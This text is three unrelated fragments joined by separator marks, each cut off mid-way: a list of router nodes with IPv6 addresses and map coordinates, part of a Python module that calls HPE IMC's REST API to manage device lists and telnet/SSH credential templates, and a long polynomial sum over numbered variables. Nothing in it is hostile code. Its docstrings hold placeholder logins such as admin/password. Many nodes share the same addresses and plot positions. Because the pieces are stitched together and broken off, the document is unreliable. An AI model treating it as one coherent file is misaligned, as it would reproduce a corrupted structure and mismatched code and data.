'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'hst',
'longitude': -95.3633,
'type': 'transit',
'icon': 'router',
'y': 1185.49743746152,
'x': 93.011342707737
}, {
'name': 'chi',
'latitude': 41.85,
'ipaddress': 'fc00:e968:6179::de52:7100',
'site': 'chi',
'longitude': -87.65,
'type': 'transit',
'icon': 'router',
'y': -1.78890844737532,
'x': 347.621281446664
}, {
'name': 'atl',
'latitude': 33.7861178428426,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'atl',
'longitude': -84.1959236252621,
'type': 'transit',
'icon': 'router',
'y': 1188.17754207982,
'x': 476.26630312528
}, {
'name': 'min',
'latitude': 44.98,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'min',
'longitude': -93.2638,
'type': 'transit',
'icon': 'router',
'y': -4.46901306567981,
'x': -67.7949343905326
}, {
'name': 'lax',
'latitude': 34.0522,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'lax',
'longitude': -118.244,
'type': 'transit',
'icon': 'router',
'y': 941.607917195807,
'x': -702.979728928698
}, {
'name': 'kcy',
'latitude': 39.0997,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'kcy',
'longitude': -94.5786,
'type': 'transit',
'icon': 'router',
'y': 539.592224450132,
'x': -65.1148297722282
}, {
'name': 'nyc',
'latitude': 40.7879,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'nyc',
'longitude': -74.0143,
'type': 'transit',
'icon': 'router',
'y': 378.785947351863,
'x': 679.954254116421
}, {
'name': 'wdc',
'latitude': 38.8951,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'wdc',
'longitude': -77.0364,
'type': 'transit',
'icon': 'router',
'y': 767.401117006014,
'x': 599.551115567286
}, {
'name': 'por',
'latitude': 45.5234,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'por',
'longitude': -122.676,
'type': 'transit',
'icon': 'router',
'y': -15.1894315388978,
'x': -1016.55196927032
}, {
'name': 'alb',
'latitude': 42.6526,
'ipaddress': 'fc00:db20:35b:7399::5',
'site': 'alb',
'longitude': -73.7562,
'type': 'transit',
'icon': 'router',
'y': 0.891196170929173,
'x': 1041.76837758753
}, {
'name': 'mia',
'latitude': 25.7743,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'mia',
'longitude': -80.1937,
'type': 'transit',
'icon': 'router',
'y': 1177.4571236066,
'x': 1023.0076452594
}, {
'name': 'san',
'latitude': 32.7153,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'san',
'longitude': -117.157,
'type': 'transit',
'icon': 'router',
'y': 1180.13722822491,
'x': -400.12790706029
}, {
'name': 'bos',
'latitude': 42.3584,
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'site': 'bos',
'longitude': -71.0598,
'type': 'transit',
'icon': 'router',
'y': 378.785947351863,
'x': 1341.94009483763
},
{
'name': 'sjc',
'latitude': 36.137242513163,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'sjc',
'longitude': -120.754451723841,
'type': 'transit',
'icon': 'router',
'y': 547.632538305046,
'x': -558.254079540255
},
{
'name': 'dxb',
'latitude': 25.2531745,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'dxb',
'longitude': 55.36567279999997,
'type': 'transit',
'icon': 'router',
'y': 547.632538305046,
'x': -558.254079540255
},
{
'name': 'sin',
'latitude': 1.352083,
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'site': 'sin',
'longitude': 103.81983600000001,
'type': 'transit',
'icon': 'router',
'y': 547.632538305046,
'x': -558.254079540255
},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '32.380120',
'longitude': '-86.300629',
'name': 'AL',
'site': 'Montgomery',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '58.299740',
'longitude': '-134.406794',
'name': 'AK',
'site': 'Juneau',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '33.448260',
'longitude': '-112.075774',
'name': 'AZ',
'site': 'Phoenix',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '34.748655',
'longitude': '-92.274494',
'name': 'AR',
'site': 'Little Rock',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '38.579065',
'longitude': '-121.491014',
'name': 'CA',
'site': 'Sacramento',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '39.740010',
'longitude': '-104.992259',
'name': 'CO',
'site': 'Denver',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '41.763325',
'longitude': '-72.674069',
'name': 'CT',
'site': 'Hartford',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '39.158035',
'longitude': '-75.524734',
'name': 'DE',
'site': 'Dover',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '30.439775',
'longitude': '-84.280649',
'name': 'FL',
'site': 'Tallahassee',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '33.748315',
'longitude': '-84.391109',
'name': 'GA',
'site': 'Atlanta',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '21.304770',
'longitude': '-157.857614',
'name': 'HI',
'site': 'Honolulu',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '43.606980',
'longitude': '-116.193409',
'name': 'ID',
'site': 'Boise',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '39.801055',
'longitude': '-89.643604',
'name': 'IL',
'site': 'Springfield',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '39.766910',
'longitude': '-86.149964',
'name': 'IN',
'site': 'Indianapolis',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '41.589790',
'longitude': '-93.615659',
'name': 'IA',
'site': 'Des Moines',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '39.049285',
'longitude': '-95.671184',
'name': 'KS',
'site': 'Topeka',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '38.195070',
'longitude': '-84.878694',
'name': 'KY',
'site': 'Frankfort',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '30.443345',
'longitude': '-91.186994',
'name': 'LA',
'site': 'Baton Rouge',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '44.318036',
'longitude': '-69.776218',
'name': 'ME',
'site': 'Augusta',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '38.976700',
'longitude': '-76.489934',
'name': 'MD',
'site': 'Annapolis',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '42.358635',
'longitude': '-71.056699',
'name': 'MA',
'site': 'Boston',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '42.731940',
'longitude': '-84.552249',
'name': 'MI',
'site': 'Lansing',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '44.943829',
'longitude': '-93.093326',
'name': 'MN',
'site': 'Saint Paul',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '32.298690',
'longitude': '-90.180489',
'name': 'MS',
'site': 'Jackson',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '38.577515',
'longitude': '-92.177839',
'name': 'MO',
'site': 'Jefferson City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '46.589760',
'longitude': '-112.021202',
'name': 'MT',
'site': 'Helena',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '40.813620',
'longitude': '-96.707739',
'name': 'NE',
'site': 'Lincoln',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '39.164885',
'longitude': '-119.766999',
'name': 'NV',
'site': 'Carson City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '43.207250',
'longitude': '-71.536604',
'name': 'NH',
'site': 'Concord',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '40.217875',
'longitude': '-74.759404',
'name': 'NJ',
'site': 'Trenton',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '35.691543',
'longitude': '-105.937406',
'name': 'NM',
'site': 'Santa Fe',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '42.651445',
'longitude': '-73.755254',
'name': 'NY',
'site': 'Albany',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '35.785510',
'longitude': '-78.642669',
'name': 'NC',
'site': 'Raleigh',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '46.805372',
'longitude': '-100.779334',
'name': 'ND',
'site': 'Bismarck',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '39.961960',
'longitude': '-83.002984',
'name': 'OH',
'site': 'Columbus',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '35.472015',
'longitude': '-97.520354',
'name': 'OK',
'site': 'Oklahoma City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '44.933260',
'longitude': '-123.043814',
'name': 'OR',
'site': 'Salem',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:db20:35b:7399::5',
'latitude': '40.259865',
'longitude': '-76.882230',
'name': 'PA',
'site': 'Harrisburg',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '41.823875',
'longitude': '-71.411994',
'name': 'RI',
'site': 'Providence',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '33.998550',
'longitude': '-81.045249',
'name': 'SC',
'site': 'Columbia',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '44.368924',
'longitude': '-100.350158',
'name': 'SD',
'site': 'Pierre',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '36.167783',
'longitude': '-86.778365',
'name': 'TN',
'site': 'Nashville',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'latitude': '30.267605',
'longitude': '-97.742984',
'name': 'TX',
'site': 'Austin',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '40.759505',
'longitude': '-111.888229',
'name': 'UT',
'site': 'Salt Lake City',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '44.260299',
'longitude': '-72.576264',
'name': 'VT',
'site': 'Montpelier',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '37.540700',
'longitude': '-77.433654',
'name': 'VA',
'site': 'Richmond',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fdf8:f53e:61e4::18',
'latitude': '47.039231',
'longitude': '-122.891366',
'name': 'WA',
'site': 'Olympia',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fc00:e968:6179::de52:7100',
'latitude': '38.350195',
'longitude': '-81.638989',
'name': 'WV',
'site': 'Charleston',
'type': 'transit',
'x': -1021.91217850693,
'y': 550.31264292335},
{'icon': 'router',
'ipaddress': 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'latitude': '43.072950',
'longitude': '-89.386694',
'name': 'WI',
'site': 'Madison',
'type': | |
<gh_stars>10-100
#!/usr/bin/env python3
# coding=utf-8
# author: @netmanchris
# -*- coding: utf-8 -*-
"""
This module contains functions for working with the system configuration
capabilities of the HPE IMC NMS platform using the RESTful API
"""
# This section imports required libraries
import json
import requests
from pyhpeimc.auth import HEADERS
# This section contains functions which operate at the system level
def get_system_vendors(auth, url):
    """Takes no input to issue a RESTful call to HP IMC\n
    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: list of dictionaries where each dictionary represents a single vendor
    :rtype: list
    >>> from pyhpeimc.auth import *
    >>> from pyhpeimc.plat.system import *
    >>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
    >>> vendors = get_system_vendors(auth.creds, auth.url)
    >>> assert type(vendors) is list
    >>> assert 'name' in vendors[0]
    """
    f_url = url + '/imcrs/plat/res/vendor?start=0&size=10000&orderBy=id&desc=false&total=false'
    try:
        # The GET itself is what raises RequestException; it must live inside
        # the try block for the handler below to ever catch anything.
        response = requests.get(f_url, auth=auth, headers=HEADERS)
        if response.status_code == 200:
            system_vendors = json.loads(response.text)
            return system_vendors['deviceVendor']
        # Non-200 responses fall through and return None, matching the
        # original behavior.
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " get_system_vendors: An Error has occured"
def get_system_category(auth, url):
    """Takes no input to issue a RESTful call to HP IMC\n
    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: list of dictionaries where each dictionary represents a single device category
    :rtype: list
    >>> from pyhpeimc.auth import *
    >>> from pyhpeimc.plat.device import *
    >>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
    >>> categories = get_system_category(auth.creds, auth.url)
    >>> assert type(categories) is list
    >>> assert 'name' in categories[0]
    """
    f_url = url + '/imcrs/plat/res/category?start=0&size=10000&orderBy=id&desc=false&total=false'
    try:
        # Keep the GET inside the try block so connection failures are
        # actually caught by the handler below.
        response = requests.get(f_url, auth=auth, headers=HEADERS)
        if response.status_code == 200:
            system_category = json.loads(response.text)
            return system_category['deviceCategory']
        # Non-200 responses fall through and return None, matching the
        # original behavior.
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " get_system_category: An Error has occured"
def get_system_device_models(auth, url):
    """Takes no input to issue a RESTful call to HP IMC

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: list of dictionaries where each dictionary represents a single device model
    :rtype: list
    >>> from pyhpeimc.auth import *
    >>> from pyhpeimc.plat.device import *
    >>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
    >>> device_models = get_system_device_models(auth.creds, auth.url)
    >>> assert type(device_models) is list
    >>> assert 'virtualDeviceName' in device_models[0]
    """
    f_url = url + '/imcrs/plat/res/model?start=0&size=10000&orderBy=id&desc=false&total=false'
    try:
        # Keep the GET inside the try block so connection failures are
        # actually caught by the handler below.
        response = requests.get(f_url, auth=auth, headers=HEADERS)
        if response.status_code == 200:
            system_device_model = json.loads(response.text)
            return system_device_model['deviceModel']
        # Non-200 responses fall through and return None, matching the
        # original behavior.
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " get_system_device_models: An Error has occured"
def get_system_series(auth, url):
    """Takes no input to issue a RESTful call to HP IMC

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: list of dictionaries where each dictionary represents a single device series
    :rtype: list
    >>> from pyhpeimc.auth import *
    >>> from pyhpeimc.plat.device import *
    >>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
    >>> series = get_system_series(auth.creds, auth.url)
    >>> assert type(series) is list
    >>> assert 'name' in series[0]
    """
    f_url = url + '/imcrs/plat/res/series?managedOnly=false&start=0&size=10000&orderBy=id&desc' \
                  '=false&total=false'
    try:
        # Keep the GET inside the try block so connection failures are
        # actually caught by the handler below.
        response = requests.get(f_url, auth=auth, headers=HEADERS)
        if response.status_code == 200:
            system_series = json.loads(response.text)
            return system_series['deviceSeries']
        # Non-200 responses fall through and return None, matching the
        # original behavior.
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " get_system_series: An Error has occured"
# This section deals with manipulating system authentication credentials
# Telnet Templates
def create_telnet_template(auth, url, telnet_template):
    """
    Function takes input of a dictionary containing the required key/value pairs for the
    creation of a telnet template.

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :param telnet_template: dictionary of valid JSON which conforms to the API schema
    :return: int value of HTTP response code 201 for proper creation or 404 for failed creation
    :rtype: int

    Sample of proper KV pairs. Please see documentation for valid values for different fields.

    telnet_template = {"type": "0",
                       "name": "User_with_Enable",
                       "authType": "4",
                       "userName": "admin",
                       "userPassword": "password",
                       "superPassword": "password",
                       "authTypeStr": "Username + Password + Super/Manager Password",
                       "timeout": "4",
                       "retries": "1",
                       "port": "23",
                       "version": "1",
                       "creator": "admin",
                       "accessType": "1",
                       "operatorGroupStr": ""}
    """
    f_url = url + "/imcrs/plat/res/telnet/add"
    try:
        # The POST itself is what can raise RequestException; it must be
        # inside the try block for the handler below to catch it.
        response = requests.post(f_url, data=json.dumps(telnet_template), auth=auth,
                                 headers=HEADERS)
        return response.status_code
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " create_telnet_template: An Error has occured"
def get_telnet_template(auth, url, template_name=None):
    """
    Takes no input, or template_name as input, to issue a RESTful call to HP IMC.

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :param template_name: str value of template name
    :return: list object containing one or more dictionaries where each dictionary represents
        one telnet template, or int 404 when template_name is given but not found
    :rtype: list
    """
    f_url = url + "/imcrs/plat/res/telnet?start=0&size=10000&desc=false&total=false"
    try:
        # Keep the GET inside the try block so connection failures are
        # actually caught by the handler below.
        response = requests.get(f_url, auth=auth, headers=HEADERS)
        if response.status_code == 200:
            telnet_templates = json.loads(response.text)
            # The API returns a bare dict (not a list) when only a single
            # template exists; normalise to a list so callers can always iterate.
            if isinstance(telnet_templates['telnetParamTemplate'], dict):
                telnet_templates['telnetParamTemplate'] = [telnet_templates['telnetParamTemplate']]
            if template_name is None:
                return telnet_templates['telnetParamTemplate']
            for telnet_template in telnet_templates['telnetParamTemplate']:
                if telnet_template['name'] == template_name:
                    return [telnet_template]
            # No template matched the requested name.
            return 404
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " get_telnet_template: An Error has occured"
def modify_telnet_template(auth, url, telnet_template, template_name=None, template_id=None):
    """
    Function takes input of a dictionary containing the required key/value pairs for the
    modification of a telnet template.

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :param telnet_template: dictionary of valid JSON which conforms to the API schema
    :param template_name: str name of the template; defaults to telnet_template['name']
    :param template_id: internal IMC number which designates the specific telnet template
    :return: int value of HTTP response code 201 for proper creation or 404 for failed creation
    :rtype: int

    Sample of proper KV pairs. Please see documentation for valid values for different fields.

    telnet_template = {"type": "0",
                       "name": "User_with_Enable",
                       "authType": "4",
                       "userName": "newadmin",
                       "userPassword": "<PASSWORD>",
                       "superPassword": "<PASSWORD>",
                       "authTypeStr": "Username + Password + Super/Manager Password",
                       "timeout": "4",
                       "retries": "1",
                       "port": "23",
                       "version": "1",
                       "creator": "admin",
                       "accessType": "1",
                       "operatorGroupStr": ""}
    """
    if template_name is None:
        template_name = telnet_template['name']
    if template_id is None:
        # Resolve the template id by name. If no template matches,
        # template_id stays None and the server rejects the request,
        # matching the original behavior.
        for template in get_telnet_template(auth, url):
            if template['name'] == template_name:
                template_id = template['id']
    f_url = url + "/imcrs/plat/res/telnet/" + str(template_id) + "/update"
    try:
        # The PUT itself is what can raise RequestException; it must be
        # inside the try block for the handler below to catch it.
        response = requests.put(f_url, data=json.dumps(telnet_template), auth=auth,
                                headers=HEADERS)
        return response.status_code
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " modify_telnet_template: An Error has occured"
def delete_telnet_template(auth, url, template_name=None, template_id=None):
    """
    Takes template_name or template_id as input to issue a RESTful call to HP IMC which will
    delete the specific telnet template from the IMC system.

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :param template_name: str value of template name
    :param template_id: str value of the template's internal id
    :return: int HTTP response code
    :rtype: int
    :raises ValueError: if neither template_name nor template_id is supplied
    """
    try:
        if template_id is None:
            if template_name is None:
                # The original code referenced an undefined variable here and
                # crashed with NameError; at least one identifier is required
                # to locate the template.
                raise ValueError("Either template_name or template_id must be supplied")
            for template in get_telnet_template(auth, url):
                if template['name'] == template_name:
                    template_id = template['id']
        f_url = url + "/imcrs/plat/res/telnet/%s/delete" % template_id
        response = requests.delete(f_url, auth=auth, headers=HEADERS)
        return response.status_code
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " delete_telnet_template: An Error has occured"
# SSH Templates
def create_ssh_template(auth, url, ssh_template):
    """
    Function takes input of a dictionary containing the required key/value pairs for the
    creation of an ssh template.

    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :param ssh_template: dictionary of valid JSON which conforms to the API schema
    :return: int value of HTTP response code 201 for proper creation or 404 for failed creation
    :rtype: int

    Sample of proper KV pairs. Please see documentation for valid values for different fields.

    ssh_template = {
        "type": "0",
        "name": "ssh_admin_template",
        "authType": "3",
        "authTypeStr": "Password + Super Password",
        "userName": "admin",
        "password": "password",
        "superPassword": "password",
        "port": "22",
        "timeout": "10",
        "retries": "3",
        "keyFileName": "",
        "keyPhrase": ""
    }
    """
    f_url = url + "/imcrs/plat/res/ssh/add"
    try:
        # The POST itself is what can raise RequestException; it must be
        # inside the try block for the handler below to catch it.
        response = requests.post(f_url, data=json.dumps(ssh_template), auth=auth,
                                 headers=HEADERS)
        return response.status_code
    except requests.exceptions.RequestException as error:
        return "Error:\n" + str(error) + " create_ssh_template: An Error has occured"
def get_ssh_template(auth, url, template_name=None):
"""
Takes no input, or template_name as input to issue RESTUL call to HP IMC
| |
* uk_12
+ 94864 * uk_120
+ 416724 * uk_121
+ 735196 * uk_122
+ 142296 * uk_123
+ 1830609 * uk_124
+ 3229611 * uk_125
+ 625086 * uk_126
+ 5697769 * uk_127
+ 1102794 * uk_128
+ 213444 * uk_129
+ 1325884 * uk_13
+ 74088 * uk_130
+ 49392 * uk_131
+ 216972 * uk_132
+ 382788 * uk_133
+ 74088 * uk_134
+ 32928 * uk_135
+ 144648 * uk_136
+ 255192 * uk_137
+ 49392 * uk_138
+ 635418 * uk_139
+ 5824419 * uk_14
+ 1121022 * uk_140
+ 216972 * uk_141
+ 1977738 * uk_142
+ 382788 * uk_143
+ 74088 * uk_144
+ 21952 * uk_145
+ 96432 * uk_146
+ 170128 * uk_147
+ 32928 * uk_148
+ 423612 * uk_149
+ 10275601 * uk_15
+ 747348 * uk_150
+ 144648 * uk_151
+ 1318492 * uk_152
+ 255192 * uk_153
+ 49392 * uk_154
+ 1860867 * uk_155
+ 3282993 * uk_156
+ 635418 * uk_157
+ 5791947 * uk_158
+ 1121022 * uk_159
+ 1988826 * uk_16
+ 216972 * uk_160
+ 10218313 * uk_161
+ 1977738 * uk_162
+ 382788 * uk_163
+ 74088 * uk_164
+ 3969 * uk_17
+ 7623 * uk_18
+ 2646 * uk_19
+ 63 * uk_2
+ 1764 * uk_20
+ 7749 * uk_21
+ 13671 * uk_22
+ 2646 * uk_23
+ 14641 * uk_24
+ 5082 * uk_25
+ 3388 * uk_26
+ 14883 * uk_27
+ 26257 * uk_28
+ 5082 * uk_29
+ 121 * uk_3
+ 1764 * uk_30
+ 1176 * uk_31
+ 5166 * uk_32
+ 9114 * uk_33
+ 1764 * uk_34
+ 784 * uk_35
+ 3444 * uk_36
+ 6076 * uk_37
+ 1176 * uk_38
+ 15129 * uk_39
+ 42 * uk_4
+ 26691 * uk_40
+ 5166 * uk_41
+ 47089 * uk_42
+ 9114 * uk_43
+ 1764 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 271319099689 * uk_47
+ 94176877578 * uk_48
+ 62784585052 * uk_49
+ 28 * uk_5
+ 275803712907 * uk_50
+ 486580534153 * uk_51
+ 94176877578 * uk_52
+ 187944057 * uk_53
+ 360971919 * uk_54
+ 125296038 * uk_55
+ 83530692 * uk_56
+ 366938397 * uk_57
+ 647362863 * uk_58
+ 125296038 * uk_59
+ 123 * uk_6
+ 693295273 * uk_60
+ 240647946 * uk_61
+ 160431964 * uk_62
+ 704754699 * uk_63
+ 1243347721 * uk_64
+ 240647946 * uk_65
+ 83530692 * uk_66
+ 55687128 * uk_67
+ 244625598 * uk_68
+ 431575242 * uk_69
+ 217 * uk_7
+ 83530692 * uk_70
+ 37124752 * uk_71
+ 163083732 * uk_72
+ 287716828 * uk_73
+ 55687128 * uk_74
+ 716403537 * uk_75
+ 1263898923 * uk_76
+ 244625598 * uk_77
+ 2229805417 * uk_78
+ 431575242 * uk_79
+ 42 * uk_8
+ 83530692 * uk_80
+ 250047 * uk_81
+ 480249 * uk_82
+ 166698 * uk_83
+ 111132 * uk_84
+ 488187 * uk_85
+ 861273 * uk_86
+ 166698 * uk_87
+ 922383 * uk_88
+ 320166 * uk_89
+ 2242306609 * uk_9
+ 213444 * uk_90
+ 937629 * uk_91
+ 1654191 * uk_92
+ 320166 * uk_93
+ 111132 * uk_94
+ 74088 * uk_95
